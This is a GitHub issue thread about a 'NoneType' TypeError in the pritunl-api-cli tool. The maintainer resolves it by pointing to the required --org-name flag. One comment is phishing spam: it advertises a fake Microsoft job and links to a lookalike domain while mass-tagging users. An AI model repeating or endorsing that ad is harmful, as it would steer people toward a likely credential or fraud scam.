### ISSUE TITLE
TypeError: 'NoneType' object is not subscriptable

### ISSUE THREAD

**Issue by varunchandak** [nathanielvarona/pritunl-api-python#30]
When running this command:
```
pritunl-api-cli user get --all-users --show-advanced-details
```

I get this:

```
Traceback (most recent call last):
  File "/opt/homebrew/bin/pritunl-api-cli", line 8, in <module>
    sys.exit(cli())
  File "/opt/homebrew/lib/python3.9/site-packages/click/core.py", line 1130, in __call__
    return self.main(*args, **kwargs)
  File "/opt/homebrew/lib/python3.9/site-packages/click/core.py", line 1055, in main
    rv = self.invoke(ctx)
  File "/opt/homebrew/lib/python3.9/site-packages/click/core.py", line 1657, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/opt/homebrew/lib/python3.9/site-packages/click/core.py", line 1657, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/opt/homebrew/lib/python3.9/site-packages/click/core.py", line 1404, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/opt/homebrew/lib/python3.9/site-packages/click/core.py", line 760, in invoke
    return __callback(*args, **kwargs)
  File "/opt/homebrew/lib/python3.9/site-packages/pritunl_api_cli/commands/user.py", line 17, in user_get
    user.get(**kwargs)
  File "/opt/homebrew/lib/python3.9/site-packages/pritunl_api_cli/core/user.py", line 34, in get
    org, user = org_user(pritunl=pritunl, org_name=kwargs['org_name'])
  File "/opt/homebrew/lib/python3.9/site-packages/pritunl_api/utils/query.py", line 15, in org_user
    user = pritunl.user.get(org_id=org['id'])
TypeError: 'NoneType' object is not subscriptable
```

**Comment by nathanielvarona** [comment]
Hello @varunchandak,

Pritunl collects users by organization, so ensure you have the flag `--org-name` when getting the user(s).
Example:
```
pritunl-api-cli user get --org-name <ORGANIZATION NAME> --all-users --show-advanced-details
```
See https://asciinema.org/a/586481?t=44 for an actual example.

Also, don't forget you have the correct credentials loaded in your environment variables before using `pritunl-api-cli`.
Example:
```
export PRITUNL_BASE_URL="https://vpn.domain.tld/"                                                                                                        
export PRITUNL_API_TOKEN="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"                                                                                              
export PRITUNL_API_SECRET="XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
```

Good Luck,

**Comment by uc-Pri** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
ns-capy, @skystar520, @shakex, @cosark, @myblueo, @luoshen-data, @sunlei, @amorist, @msgjp, @AR-Life, @hulebaji, @lontoken, @hansstanley, @lzakharov, @BadJacky, @li-zhixin, @xinwuyun, @kprimo, @leejss, @lowzj

**Comment by nathanielvarona** [comment]
Closing the issue now.
